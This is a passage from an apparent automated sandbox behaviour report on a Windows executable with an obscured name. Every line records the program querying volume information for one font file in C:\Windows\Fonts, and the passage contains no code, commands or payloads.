Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
